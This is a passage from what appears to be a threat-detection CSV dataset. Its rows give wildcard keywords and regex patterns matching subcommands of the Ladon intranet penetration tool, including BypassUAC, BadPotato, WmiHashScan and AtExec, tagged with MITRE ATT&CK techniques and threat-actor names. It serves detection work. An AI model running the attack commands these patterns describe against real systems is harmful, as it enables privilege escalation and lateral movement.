Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50701" "*Ladon *WinrmScan*",".{0,1000}Ladon\s.{0,1000}WinrmScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50702" "*Ladon *WmiHashScan*",".{0,1000}Ladon\s.{0,1000}WmiHashScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50703" "*Ladon *WmiScan*",".{0,1000}Ladon\s.{0,1000}WmiScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50704" "*Ladon ActiveAdmin*",".{0,1000}Ladon\sActiveAdmin.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50705" "*Ladon ActiveGuest*",".{0,1000}Ladon\sActiveGuest.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50706" "*Ladon AdiDnsDump *",".{0,1000}Ladon\sAdiDnsDump\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50707" "*Ladon at c:*",".{0,1000}Ladon\sat\sc\:.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50708" "*Ladon AtExec*",".{0,1000}Ladon\sAtExec.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50709" "*Ladon AutoRun*",".{0,1000}Ladon\sAutoRun.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50710" "*Ladon BadPotato*",".{0,1000}Ladon\sBadPotato.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50711" "*Ladon BypassUAC*",".{0,1000}Ladon\sBypassUAC.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50712" "*Ladon CheckDoor*",".{0,1000}Ladon\sCheckDoor.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50713" "*Ladon Clslog*",".{0,1000}Ladon\sClslog.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50714" "*Ladon CmdDll *",".{0,1000}Ladon\sCmdDll\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50715" "*Ladon cmdline*",".{0,1000}Ladon\scmdline.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 